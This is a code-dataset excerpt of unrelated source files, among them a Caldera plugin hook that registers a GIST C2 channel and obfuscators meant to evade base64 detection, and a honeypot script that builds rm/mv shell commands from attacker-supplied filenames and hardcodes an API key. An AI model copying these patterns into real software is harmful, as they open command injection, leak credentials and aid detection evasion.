looks complicated, but it really just says if at least one of the pixel comparisons says true, then we assume it is a smile\n # Due to the fact tha we know ~54% of the faces in the training set are smiling, it means we should assume it is a smile when there is a draw \n largeBoy = np.array([comarisonMatrix, comarisonMatrix2])\n largerBoy = largeBoy.T.sum(axis=1)\n resultMatrix = largerBoy >= 1\n fpc = fPC(resultMatrix, trainingLabels)\n return fpc\n elif len(param) == 2:\n pixel1 = trainingFaces[:, param[0][0][0]][:, param[0][0][1]]\n pixel2 = trainingFaces[:, param[0][1][0]][:, param[0][1][1]]\n pixel3 = trainingFaces[:, param[1][0][0]][:, param[1][0][1]]\n pixel4 = trainingFaces[:, param[1][1][0]][:, param[1][1][1]]\n pixel5 = trainingFaces[:, x][:, y]\n pixel6 = trainingFaces[:, z][:, a]\n comarisonMatrix = pixel1 > pixel2\n comarisonMatrix2 = pixel3 > pixel4\n comarisonMatrix3 = pixel5 > pixel6\n\n largeBoy = np.array([comarisonMatrix, comarisonMatrix2, comarisonMatrix3])\n largerBoy = largeBoy.T.sum(axis=1)\n resultMatrix = largerBoy >= 2\n fpc = fPC(resultMatrix, trainingLabels)\n return fpc\n elif len(param) == 3:\n pixel1 = trainingFaces[:, param[0][0][0]][:, param[0][0][1]]\n pixel2 = trainingFaces[:, param[0][1][0]][:, param[0][1][1]]\n pixel3 = trainingFaces[:, param[1][0][0]][:, param[1][0][1]]\n pixel4 = trainingFaces[:, param[1][1][0]][:, param[1][1][1]]\n pixel5 = trainingFaces[:, param[2][0][0]][:, param[2][0][1]]\n pixel6 = trainingFaces[:, param[2][1][0]][:, param[2][1][1]]\n pixel7 = trainingFaces[:, x][:, y]\n pixel8 = trainingFaces[:, z][:, a]\n comarisonMatrix = pixel1 > pixel2\n comarisonMatrix2 = pixel3 > pixel4\n comarisonMatrix3 = pixel5 > pixel6\n comarisonMatrix4 = pixel7 > pixel8\n\n largeBoy = np.array([comarisonMatrix, comarisonMatrix2, comarisonMatrix3, comarisonMatrix4])\n largerBoy = largeBoy.T.sum(axis=1)\n resultMatrix = largerBoy >= 2\n fpc = fPC(resultMatrix, trainingLabels)\n return fpc\n elif len(param) == 4:\n pixel1 = trainingFaces[:, param[0][0][0]][:, param[0][0][1]]\n pixel2 = trainingFaces[:, param[0][1][0]][:, param[0][1][1]]\n pixel3 = trainingFaces[:, param[1][0][0]][:, param[1][0][1]]\n pixel4 = trainingFaces[:, param[1][1][0]][:, param[1][1][1]]\n pixel5 = trainingFaces[:, param[2][0][0]][:, param[2][0][1]]\n pixel6 = trainingFaces[:, param[2][1][0]][:, param[2][1][1]]\n pixel7 = trainingFaces[:, param[3][0][0]][:, param[3][0][1]]\n pixel8 = trainingFaces[:, param[3][1][0]][:, param[3][1][1]]\n pixel9 = trainingFaces[:, x][:, y]\n pixel10 = trainingFaces[:, z][:, a]\n comarisonMatrix = pixel1 > pixel2\n comarisonMatrix2 = pixel3 > pixel4\n comarisonMatrix3 = pixel5 > pixel6\n comarisonMatrix4 = pixel7 > pixel8\n comarisonMatrix5 = pixel9 > pixel10\n\n largeBoy = np.array([comarisonMatrix, comarisonMatrix2, comarisonMatrix3, comarisonMatrix4, comarisonMatrix5])\n largerBoy = largeBoy.T.sum(axis=1)\n resultMatrix = largerBoy >= 3\n fpc = fPC(resultMatrix, trainingLabels)\n return fpc\n\n# In this function we know what the pixel comparisions should be, so we can test them with 3/5 being considered a smile\ndef testModel(optimalFeatures, testingFaces, testingLabels):\n # There are five optimal pixel pairs, here we test to see just how optimal they really are\n pixel1 = testingFaces[:, optimalFeatures[0][0][0]][:, optimalFeatures[0][0][1]]\n pixel2 = testingFaces[:, optimalFeatures[0][1][0]][:, optimalFeatures[0][1][1]]\n pixel3 = testingFaces[:, optimalFeatures[1][0][0]][:, optimalFeatures[1][0][1]]\n pixel4 = testingFaces[:, optimalFeatures[1][1][0]][:, optimalFeatures[1][1][1]]\n pixel5 = testingFaces[:, optimalFeatures[2][0][0]][:, optimalFeatures[2][0][1]]\n pixel6 = testingFaces[:, optimalFeatures[2][1][0]][:, optimalFeatures[2][1][1]]\n pixel7 = testingFaces[:, optimalFeatures[3][0][0]][:, optimalFeatures[3][0][1]]\n pixel8 = testingFaces[:, optimalFeatures[3][1][0]][:, optimalFeatures[3][1][1]]\n pixel9 = testingFaces[:, optimalFeatures[4][0][0]][:, optimalFeatures[4][0][1]]\n pixel10 = testingFaces[:, optimalFeatures[4][1][0]][:, optimalFeatures[4][1][1]]\n\n comarisonMatrix = pixel1 > pixel2\n comarisonMatrix2 = pixel3 > pixel4\n comarisonMatrix3 = pixel5 > pixel6\n comarisonMatrix4 = pixel7 > pixel8\n comarisonMatrix5 = pixel9 > pixel10\n\n\n largeBoy = np.array([comarisonMatrix, comarisonMatrix2, comarisonMatrix3, comarisonMatrix4, comarisonMatrix5])\n largerBoy = largeBoy.T.sum(axis=1)\n resultMatrix = largerBoy >= 3\n fpc = fPC(resultMatrix, testingLabels)\n return fpc\n\n\n#This function simply shows visually on a sample face where the optimal pixels are. \ndef stepwiseRegression (testingFaces, features):\n show = True\n if show:\n # Show an arbitrary test image in grayscale\n im = testingFaces[0,:,:]\n fig,ax = plt.subplots(1)\n ax.imshow(im, cmap='gray')\n # Show r1,c1\n rect = patches.Rectangle((features[0][0][0] - 0.5, features[0][0][1] - 0.5), 1, 1, linewidth=2, edgecolor='r', facecolor='none')\n ax.add_patch(rect)\n # Show r2,c2\n rect = patches.Rectangle((features[0][1][0] - 0.5, features[0][1][1] - 0.5), 1, 1, linewidth=2, edgecolor='r', facecolor='none')\n ax.add_patch(rect)\n # Display the merged result\n rect = patches.Rectangle((features[1][0][0] - 0.5, features[1][0][1] - 0.5), 1, 1, linewidth=2, edgecolor='b', facecolor='none')\n ax.add_patch(rect)\n # Show r2,c2\n rect = patches.Rectangle((features[1][1][0] - 0.5, features[1][1][1] - 0.5), 1, 1, linewidth=2, edgecolor='b', facecolor='none')\n ax.add_patch(rect)\n rect = patches.Rectangle((features[2][0][0] - 0.5, features[2][0][1] - 0.5), 1, 1, linewidth=2, edgecolor='g', facecolor='none')\n ax.add_patch(rect)\n # Show r2,c2\n rect = patches.Rectangle((features[2][1][0] - 0.5, features[2][1][0] - 0.5), 1, 1, linewidth=2, edgecolor='g', facecolor='none')\n ax.add_patch(rect)\n\n rect = patches.Rectangle((features[3][0][0] - 0.5, features[3][0][1] - 0.5), 1, 1, linewidth=2, edgecolor='y', facecolor='none')\n ax.add_patch(rect)\n # Show r2,c2\n rect = patches.Rectangle((features[3][1][0] - 0.5, features[3][1][0] - 0.5), 1, 1, linewidth=2, edgecolor='y', facecolor='none')\n ax.add_patch(rect)\n\n rect = patches.Rectangle((features[4][0][0] - 0.5, features[4][0][1] - 0.5), 1, 1, linewidth=2, edgecolor='k', facecolor='none')\n ax.add_patch(rect)\n # Show r2,c2\n rect = patches.Rectangle((features[4][1][0] - 0.5, features[4][1][0] - 0.5), 1, 1, linewidth=2, edgecolor='k', facecolor='none')\n ax.add_patch(rect)\n\n plt.show()\n \n\nif __name__ == \"__main__\":\n #Load the training and testing data\n testingFaces, testingLabels = loadData(\"test\")\n trainingFaces, trainingLabels = loadData(\"train\")\n\n # Here a simple loop will test various sizes of training set {400, 800, 1200, 1600, 2000}\n for val in [400, 800, 1200, 1600, 2000]:\n\n print(\"\\n\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\n print(\"Traing data using size of -> \", val)\n print(\"...\\n\")\n features = []\n highestFPC = 0\n for x in range(5):\n print(\"Feature number \" + str(x + 1) + \" ==>\")\n param, highestFPC = measureAccuracyOfPredictors(trainingFaces[:val], trainingLabels[:val], features)\n features.append(param)\n print(\"Calculating next pair of pixles ...\\n\")\n print(\"These are the final featuers: \", features)\n print(\"The final FPC from the training set was : \", highestFPC)\n print(\"\\nNow we will calculate the FPC on the testing set ...\\n\")\n # When we test, regardless of the training set's size, we need to use the full testing matrix\n stepwiseRegression(testingFaces, features)\n accuracy = testModel(features, testingFaces, testingLabels)\n print(\"The FPC for the testing set is : \", accuracy)\n","sub_path":"step-wise.py","file_name":"step-wise.py","file_ext":"py","file_size_in_byte":10855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"627680101","text":"def validar_entero(n):\n if (isinstance(n, int)):\n return True\n else:\n return False\n\ndef validar_rango(n, ri, rf):\n if ( validar_entero(n) == True):\n if (n >= ri and n <= rf):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_numero(msg, ri, rf):\n n=\"\"\n while( validar_rango(n, ri, rf) == False):\n n=input(msg)\n n = int(n)\n #fin_while\n return n\n#fin_pedir_numero\n\ndef validar_nombre(nombre):\n if ( isinstance(nombre, str)):\n if (len(nombre) >= 3):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_nombre(msg):\n nombre=\"\"\n while ( validar_nombre(nombre) == False ):\n nombre=input(msg)\n #fin_while\n return nombre\n#fin_pedir_nombre\n\ndef guardar_datos(nombre_archivo, contenido, modo):\n archivo=open(nombre_archivo, modo)\n archivo.write(contenido)\n archivo.close()\n\ndef obtener_datos(nombre_archivo):\n archivo=open(nombre_archivo)\n contenido = archivo.read()\n archivo.close()\n return contenido\n\ndef obtener_datos_lista(nombre_archivo):\n archivo=open(nombre_archivo)\n lista = archivo.readlines()\n archivo.close()\n return lista\n\ndef validar_telefono(telf):\n if (isinstance(telf,int)):\n if(len(str(telf)) == 9):\n if(telf > 0):\n return True\n else:\n return False\n\n else:\n return False\n\n else:\n return False\n\ndef pedir_telf(nota):\n telf = 1457889989989\n while (validar_telefono(telf) == False):\n telf = int(input(nota))\n return telf\n\ndef validar_dni(dni):\n if (isinstance(dni,int)):\n if (len(str(dni)) == 8):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_DNI(nota):\n DNI = \"\"\n while (validar_dni(DNI) == False):\n DNI = int(input(nota))\n return DNI\n\ndef validar_real(real):\n if (isinstance(real,float)):\n return True\n else:\n return False\n\ndef pedir_real(nota):\n r = 2\n while (validar_real(r) == False):\n r = float(input(nota))\n return r\n\ndef validar_ruc(ruc):\n if (isinstance(ruc,int)):\n if (len(str(ruc)) == 11):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_ruc(nota):\n ruc = 0\n while (validar_ruc(ruc) == False):\n ruc = int(input(nota))\n return ruc\n\ndef validar_talla(talla):\n if (isinstance(talla,float)):\n if( talla >= 1.10 and talla <= 2.50):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_talla(nota):\n t = \"\"\n while (validar_talla(t) == False):\n t = float(input(nota))\n return t\n\ndef validar_codigo(codigo):\n # 1. Revisar que el nro de octetos sea 4\n data=codigo.split(\".\")\n if ( len(data) != 2):\n return False\n\n cod1 = data[0]\n cod2 = data[1]\n if ( cod1.isdigit() == False or cod2.isdigit() == True):\n return False\n\n # 4. Si llego hasta aqui, es porque es un IP valido\n return True\n\ndef pedir_codigo(nota):\n codigo_invalido=True\n while( codigo_invalido == True ):\n codigo=input(nota)\n codigo_invalido = ( validar_codigo(codigo) == False)\n #fin_while\n return codigo\n\ndef validar_estacion(estacion):\n if (estacion == \"VERANO\" or estacion == \"INVIERNO\" or\n estacion == \"PRIMAVERA\" or estacion == \"OTONO\" or\n estacion == \"verano\" or estacion == \"invierno\" or\n estacion == \"primavera\" or estacion == \"otono\" ):\n return True\n else:\n return False\n\ndef pedir_estacion(msg):\n estacion=\"\"\n while ( validar_estacion(estacion) == False ):\n estacion=input(msg)\n #fin_while\n return estacion\n\ndef validar_pecado(pecado):\n if (pecado == \"IRA\" or pecado== \"ENVIDIA\" or\n pecado == \"PEREZA\" or pecado== \"AVARICIA\" or\n pecado == \"LUJURIA\" or pecado == \"GULA\" or\n pecado == \"ORGULLO\" or pecado == \"ira\" or\n pecado == \"envidia\" or pecado== \"pereza\" or\n pecado == \"avaricia\" or pecado== \"lujuria\" or\n pecado == \"gula\" or pecado == \"orgullo\" ):\n return True\n else:\n return False\n\ndef pedir_pecado(msg):\n pecado=\"\"\n while ( validar_pecado(pecado) == False ):\n pecado=input(msg)\n #fin_while\n return pecado\n\n\ndef validar_dia(dia):\n if (dia == \"LUNES\" or dia== \"MARTES\" or\n dia == \"MIERCOLES\" or dia == \"JUEVES\" or\n dia == \"VIERNES\" or dia == \"SABADO\" or\n dia == \"DOMINGO\" or dia == \"lunes\" or\n dia == \"martes\" or dia == \"miercoles\" or\n dia == \"jueves\" or dia == \"viernes\" or\n dia == \"sabado\" or dia == \"domingo\" ):\n return True\n else:\n return False\n\ndef pedir_dia(msg):\n dia=\"\"\n while ( validar_dia(dia) == False ):\n dia=input(msg)\n #fin_while\n return dia\n\ndef validar_peso(peso):\n if (isinstance(peso,float)):\n if( peso >= 20.0 and peso <= 100.0):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_peso(nota):\n p = \"\"\n while (validar_peso(p) == False):\n p = float(input(nota))\n return p\n","sub_path":"CASTILLO/SUBMENUS/libreria2.py","file_name":"libreria2.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"382800577","text":"import random\n\ndef createlist(n):\n n=int(n)#\n return list(random.uniform(0,100)*random.randint(-1,1) for i in range(n) )\n\ndef createlis(n):\n n=int(n)#\n return list(random.randint(0,100)*random.randint(-1,1) for i in range(n) )\n\ndef fTask(n):\n Neg=0\n Arr = createlist(n)\n Mult=1\n Min=9^99\n Max = -9^99\n for iD in Arr:\n if iD < 0:\n Neg += iD\n\n if Min > iD:\n Min = iD\n Mind=Arr.index(iD)\n if Max < iD:\n Max = iD\n Mxid = Arr.index(iD)\n if Mind0:\n lastPos = i\n if lastPos != -1:\n for i in range(0,lastPos):\n SumOfPos+=Arr[i]\n print(Arr)\n print(SumOfPos)\ndef main():\n n=10\n fTask(n)\n ThTask(n)\nif __name__ == '__main__':\n main()\n","sub_path":"prog/addition_task.py","file_name":"addition_task.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"305729162","text":"from app.objects.c_obfuscator import Obfuscator\nfrom plugins.stockpile.app.contact.gist import GIST\nfrom plugins.stockpile.app.stockpile_svc import StockpileService\n\nname = 'Stockpile'\ndescription = 'A stockpile of abilities, adversaries, payloads and planners'\naddress = None\n\n\nasync def enable(services):\n stockpile_svc = StockpileService(services)\n await stockpile_svc.file_svc.add_special_payload('mission.go', stockpile_svc.dynamically_compile)\n await stockpile_svc.data_svc.load_data(directory='plugins/stockpile/data')\n\n c2_configs = await stockpile_svc.load_c2_config(directory='plugins/stockpile/data/contact')\n await stockpile_svc.contact_svc.register(GIST(services, c2_configs['GIST']))\n await stockpile_svc.data_svc.store(\n Obfuscator(name='plain-text',\n description='Does no obfuscation to any command, instead running it in plain text',\n module='plugins.stockpile.app.obfuscators.plain_text')\n )\n await stockpile_svc.data_svc.store(\n Obfuscator(name='base64',\n description='Obfuscates commands in base64',\n module='plugins.stockpile.app.obfuscators.base64_basic')\n )\n await stockpile_svc.data_svc.store(\n Obfuscator(name='base64jumble',\n description='Obfuscates commands in base64, then adds characters to evade base64 detection. '\n 'Disclaimer: this may cause duplicate links to run.',\n module='plugins.stockpile.app.obfuscators.base64_jumble')\n )\n","sub_path":"hook.py","file_name":"hook.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"4383032","text":"import csv\nimport cv2\nfrom os import listdir\nimport os.path as op\nimport numpy as np\nimport h5py\nimport tensorflow\n\n# white_list = ['map_1_backward_1']\nwhite_list = []\ndata_dir_name = 'my_data'\nimg_dir_name = 'IMG'\ndata_dir = '../' + data_dir_name\nlog_name = 'driving_log.csv'\n\n\ndef add_image(image, measurement, images, measurements):\n image_flip, measurement_flip = flip_image(image, measurement)\n\n images.append(image)\n measurements.append(measurement)\n images.append(image_flip)\n measurements.append(measurement_flip)\n\ndef flip_image(image, measurement):\n image_flipped = np.fliplr(image)\n measurement_flipped = -measurement\n return image_flipped, measurement_flipped\n\ndef get_image(path):\n path = image_paths_prefix[i] + '/' + img_dir_name + '/' + path.split(img_dir_name)[1]\n return cv2.imread(path)\n\n\nlines = []\nimage_paths_prefix = []\nsubdirs = [op.join(data_dir, f) for f in listdir(data_dir) if op.isdir(op.join(data_dir, f))]\nfor dir in subdirs:\n if white_list and op.basename(dir) not in white_list:\n continue\n log_file = op.join(dir, log_name)\n if (not op.isfile(log_file)):\n continue\n with open(log_file) as log:\n reader = csv.reader(log)\n for line in reader:\n lines.append(line)\n image_paths_prefix.append(dir)\n\nimages = []\nmeasurements = []\nfor i in range(len(lines)):\n line = lines[i]\n\n center_image = get_image(line[0])\n left_image = get_image(line[1])\n right_image = get_image(line[2])\n\n correction = 0.2\n center_steering = float(line[3])\n add_image(center_image, center_steering, images, measurements)\n add_image(left_image, center_steering + correction, images, measurements)\n add_image(right_image, center_steering - correction, images, measurements)\n\n\n\n # left_steering = center_steering + correction\n # right_steering = center_steering - correction\n #\n # images.append(center_image)\n # images.append(left_image)\n # images.append(right_image)\n # measurements.append(center_steering)\n # measurements.append(left_steering)\n # measurements.append(right_steering)\n #\n # center_image_flip, center_steering_flip = flip_image(center_image, center_steering)\n\n\n # image_flipped = np.fliplr(center_image)\n # measurement_flipped = -center_steering\n\nX_train = np.array(images)\ny_train = np.array(measurements)\n\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Convolution2D, MaxPooling2D, Cropping2D, Lambda\n\nmodel = Sequential()\nmodel.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=(160, 320, 3)))\nmodel.add(Cropping2D(cropping=((70, 25), (0, 0)), input_shape=(3, 160, 320)))\n\nmodel.add(Convolution2D(24, 5, 5, subsample=(2, 2), activation='relu'))\nmodel.add(Convolution2D(36, 5, 5, subsample=(2, 2), activation='relu'))\nmodel.add(Convolution2D(48, 5, 5, subsample=(2, 2), activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dense(50))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n\n# model.add(Convolution2D(6, 5, 5, activation='relu'))\n# model.add(MaxPooling2D())\n# model.add(Convolution2D(6, 5, 5, activation='relu'))\n# model.add(MaxPooling2D())\n# model.add(Flatten())\n# model.add(Dense(128))\n# model.add(Dense(64))\n# model.add(Dense(1))\n\n\n# model.add(Flatten())\n# model.add(Dense(128, activation='relu'))\n# model.add(Dense(64, activation='relu'))\n# model.add(Dense(16, activation='relu'))\n# model.add(Dense(1))\n\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit(X_train, y_train, validation_split=0.2, shuffle=True, nb_epoch=3, batch_size=128)\n\nmodel.save('model.h5')\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"247192950","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\nfrom __future__ import print_function\r\nimport hashlib\r\nimport requests\r\nimport json\r\nimport pygeoip\r\nimport time\r\nimport os\r\nfrom virus_total_apis import PublicApi as VirusTotalPublicApi\r\n\r\nrawdata = pygeoip.GeoIP('GeoLiteCity/GeoLiteCity.dat')\r\nAPI_KEY = '<** INSERT API KEY HERE **>'\r\nvt = VirusTotalPublicApi(API_KEY)\r\n\r\nmd5_ok = []\r\n\r\ndef ipquery(ip):\r\n data = rawdata.record_by_name(ip)\r\n country = data['country_name']\r\n city = data['city']\r\n result = str(str(city)+', ' +str(country))\r\n return(result)\r\n\r\ndef md5(fname):\r\n hash_md5 = hashlib.md5()\r\n with open(fname, \"rb\") as f:\r\n for chunk in iter(lambda: f.read(4096), b\"\"):\r\n hash_md5.update(chunk)\r\n return hash_md5.hexdigest()\r\n\r\nFichList = [ f for f in os.listdir('.') if os.path.isfile(os.path.join('.',f)) ]\r\nfor elements in FichList:\r\n\r\n if elements == \"HoneyBot.py\":\r\n pass\r\n else:\r\n\r\n # hash = md5(elements)\r\n hash = \"1cb3d083255c29501c6300db54164aeb\"\r\n\r\n if hash in md5_ok:\r\n print(\"[-] Fichier déja scanné.\")\r\n os.system('rm ' + elements)\r\n else :\r\n\r\n print(\"[+] Nouveau fichier : \" + str(hash))\r\n\r\n response = vt.get_file_report(hash)\r\n re = str(json.dumps(response, sort_keys=False, indent=4))\r\n\r\n if \"The requested resource is not among the finished, queued or pending scans\" in str(re):\r\n print(\"[+] new sample found : \" + str(elements))\r\n pass\r\n else:\r\n\r\n total = re.split('\"total\": ')[1][0:2]\r\n positive = re.split('\"positives\": ')[1][0:2]\r\n hash_md5 = hash\r\n hash_sha = re.split('\"sha256\": \"')[1].replace('\"', '')[0:64]\r\n score = str(positive) + \"/\" + str(total)\r\n r = requests.get('http://209.97.129.92/api/feed/?api_key=5e46d9260f4a422082b4c8472688120c&channel=dionaea.capture')\r\n infos_brute = r.text\r\n print(infos_brute)\r\n info = infos_brute.find(hash)\r\n add = infos_brute[info + 33 : info + 70].replace('\"saddr\": \"','').replace('\"','').replace(\" \",\"\").replace(\",\",'').replace(\"\\n\",\"\")\r\n port = infos_brute[info - 25 : info - 8].replace('\"',\"\").replace(\",\",\"\").replace(\"\\n\",\"\")\r\n capture_date = infos_brute[info + 259 : info + 310].replace('time\": \"',\"\").replace('\"',\"\").replace(',','').replace(\"\\n\",'')\r\n try :\r\n location = ipquery(add)\r\n commentaire = \" === Malware sample collect by my Honeypot === \\n Capture date : \" + capture_date + \"\\n\" + \"Md5 : \" + hash_md5 + \"\\n\" + \"Sha256 : \" + hash_sha + \"\\n\" + \"Score : \" + positive + \"/\" + total + \"\\n\" + \"Port : \" + port + \"\\n\" + \"IP source : \" + add + \"\\n\" + \"Location : \" + location\r\n location_ok = True\r\n except:\r\n commentaire = \" === Malware sample collect by my Honeypot === \\n Capture date : \" + capture_date + \"\\n\" + \"Md5 : \" + hash_md5 + \"\\n\" + \"Sha256 : \" + hash_sha + \"\\n\" + \"Score : \" + positive + \"/\" + total + \"\\n\" + \"Port : \" + port + \"\\n\" + \"IP source : \" + add + \"\\n\" + \"Location : \" + \"-\"\r\n location_ok = False\r\n print(\"Malware sample collect by my Honeypot = \")\r\n print(\"Capture date : \" + capture_date)\r\n print(\"Md5 : \" + hash_md5)\r\n print(\"Sha256 : \" + hash_sha)\r\n print(\"Score : \" + positive + \"/\" + total)\r\n print(\"Port : \" + port)\r\n print(\"IP source : \" + add)\r\n if location_ok == True:\r\n print(\"Location : \" + location)\r\n else:\r\n print(\"Location : \" + \"-\")\r\n print(\"========================================\")\r\n\r\n params = {\r\n 'apikey': API_KEY,\r\n 'resource': hash_md5,\r\n 'comment': str(commentaire)\r\n }\r\n\r\n response = requests.post('https://www.virustotal.com/vtapi/v2/comments/put', params=params)\r\n response_json = response.json()\r\n\r\n md5_ok.append(hash_md5)\r\n os.system('mv ' + elements + ' archive/')\r\n time.sleep(20)\r\n","sub_path":"HoneyBot.py","file_name":"HoneyBot.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212023520","text":"\"\"\" Compiled: 2020-09-18 10:38:52 \"\"\"\n\n#__src_file__ = \"extensions/frtb/./etc/FRTBIMAPLExport.py\"\n\"\"\"----------------------------------------------------------------------------\nMODULE\n (c) Copyright 2017 FIS Front Arena. All rights reserved.\n\nDESCRIPTION\n\n----------------------------------------------------------------------------\"\"\"\nimport re\n\nimport acm\n\nimport FRTBExport\nimport FRTBBaseWriter\nimport FRTBCommon\nimport FRTBUtility\n\n# Writers\nclass PLResultsCollector(FRTBBaseWriter.ResultsCollector):\n COLUMN_IDS = (\n FRTBCommon.IMA_PL_HYPOTHETICAL_COLUMN_ID,\n FRTBCommon.IMA_PL_ACTUAL_COLUMN_ID,\n FRTBCommon.IMA_PL_RISK_COLUMN_ID\n \n )\n _USE_PROJECTION_COORDINATES = False\n\nclass PLHypWriter(FRTBBaseWriter.Writer):\n COLUMN_IDS = (FRTBCommon.IMA_PL_HYPOTHETICAL_COLUMN_ID,)\n OUTPUT_SUB_DIR = 'pl_hypothetical'\n _MEASUREMENT_RISK_FACTOR_ATTRIBUTES = (\n 'ID', 'Group', 'Sub Group', 'Type'\n )\n\n def _createHeader(self):\n header = []\n prefix = 'Factor.'\n for label in self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES:\n header.append(prefix + label)\n\n header.extend(self._getDefaultTradeHeader())\n header.append('Profit and Loss')\n return header\n\n def _getRows(self, header):\n measurement = self._getResultsFilters()[0]\n rows = []\n risk_factors = ['Residual'] * len(self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES)\n idx_group = self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES.index('Group')\n risk_factors[idx_group] = 'Other'\n for trade_attrs, measurements in self._results_iterator:\n result = measurements[measurement].Number()\n if result:\n result = str(result)\n trade_attrs = self._getDefaultTradeAttributes(\n trade_attrs=trade_attrs\n )\n row_id = ','.join(risk_factors + trade_attrs[:-1])\n if not self._omitResult(result, measurement, row_id):\n row = risk_factors + trade_attrs + [result]\n rows.append(row)\n\n return rows\n\n def _getResultsFilters(self):\n measurement = re.split(r' |\\-', self.CALC_NAME)[0]\n return (measurement,)\n\n\nclass PLActWriter(FRTBBaseWriter.Writer):\n COLUMN_IDS = (FRTBCommon.IMA_PL_ACTUAL_COLUMN_ID,)\n OUTPUT_SUB_DIR = 'pl_actual'\n _MEASUREMENT_RISK_FACTOR_ATTRIBUTES = (\n 'ID', 'Group', 'Sub Group', 'Type'\n )\n\n def _createHeader(self):\n header = []\n prefix = 'Factor.'\n for label in self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES:\n header.append(prefix + label)\n\n header.extend(self._getDefaultTradeHeader())\n header.append('Profit and Loss')\n header.append('P&L Source')\n return header\n\n def _getRows(self, header):\n measurement = self._getResultsFilters()[0]\n rows = []\n risk_factors = ['Residual'] * len(self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES)\n idx_group = self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES.index('Group')\n risk_factors[idx_group] = 'Other'\n for trade_attrs, measurements in self._results_iterator:\n result = measurements[measurement].Number()\n if result:\n result = str(result)\n trade_attrs = self._getDefaultTradeAttributes(\n trade_attrs=trade_attrs\n )\n row_id = ','.join(risk_factors + trade_attrs[:-1] + ['Actual'])\n if not self._omitResult(result, measurement, row_id):\n row = risk_factors + trade_attrs + [result] + ['Actual']\n rows.append(row)\n\n return rows\n\n def _getResultsFilters(self):\n measurement = re.split(r' |\\-', self.CALC_NAME)[0]\n return (measurement,)\n\n\nclass PLRiskWriter(PLHypWriter):\n CALC_NAME = CALC_NAME_LONG = None\n COLUMN_IDS = (FRTBCommon.IMA_PL_RISK_COLUMN_ID,)\n OUTPUT_SUB_DIR = 'pl_risk_theoretical'\n _MEASUREMENT_RISK_FACTOR_ATTRIBUTES = \\\n PLHypWriter._MEASUREMENT_RISK_FACTOR_ATTRIBUTES + (\n 'Commodity', 'Credit Quality', 'Location', 'Grade'\n )\n\n\n# Exporters\nclass PLExport(FRTBExport.Export):\n _END_DATE_REQUIRED = True\n RESULTS_COLLECTOR_CLASS = PLResultsCollector\n\n def __init__(self):\n super(PLExport, self).__init__()\n self._long_name = self.CALC_NAME_LONG.split(' ', 5)[-1]\n self._tab_suffix = 'PL ' + self._long_name\n self._end_date_required = int(bool(self._END_DATE_REQUIRED))\n self._long_name += ' P&L'\n\n def getAelVariables(self):\n ttCalculate = 'Generate %s values.' % self._long_name.lower()\n self._ael_vars.append(\n super(PLExport, self).getPerformCalculationAelVariable(\n calc_name=self._long_name, tab_suffix=self._tab_suffix,\n tooltip=ttCalculate\n )\n )\n self._ael_vars.extend(self._getScenarioAelVariables())\n return self._ael_vars\n\n def makeColumns(self, parameters):\n calendar = parameters['scenarioCalendar']\n end_date_str = parameters[self.CALC_NAME + 'oneDayScenarioEndDate']\n start_date, end_date = self._getScenarioDates(\n parameters=parameters, end_date_str=end_date_str, calendar=calendar\n )\n columns = super(PLExport, self).makeColumns(parameters=parameters)\n column_params = {\n acm.FSymbol('PortfolioProfitLossStartDate'): 'Custom Date',\n acm.FSymbol('PortfolioProfitLossStartDateCustom'): start_date,\n acm.FSymbol('PortfolioProfitLossEndDate'): 'Custom Date',\n acm.FSymbol('PortfolioProfitLossEndDateCustom'): end_date,\n }\n columns = self._getColumns(\n parameters=parameters, column_params=column_params,\n start_date=start_date, end_date=end_date\n )\n return columns\n\n def _getScenarioAelVariables(self):\n ttEndDate = 'The end date to use in the external scenario file.'\n ael_var = [self.CALC_NAME + 'oneDayScenarioEndDate',\n 'Scenario end date_' + self._tab_suffix,\n 'string', FRTBCommon.DEFAULT_DAYS, 'Today',\n self._end_date_required, 0, ttEndDate\n ]\n return [ael_var]\n\n def _getScenarioDates(self, parameters, end_date_str, calendar):\n raise NotImplementedError\n\n def _getColumns(self, parameters, column_params, start_date, end_date):\n raise NotImplementedError\n\nclass PLHypExport(PLExport):\n WRITER_CLASSES = (PLHypWriter,)\n\n def _getScenarioDates(self, parameters, end_date_str, calendar):\n end_date = FRTBUtility.getAcmDateFromString(end_date_str, calendar)\n start_date = calendar.AdjustBankingDays(end_date, -1)\n return start_date, end_date\n\n def _getColumns(self, parameters, column_params, start_date, end_date):\n column = self.makeColumn(\n column_id=FRTBCommon.IMA_PL_HYPOTHETICAL_COLUMN_ID,\n 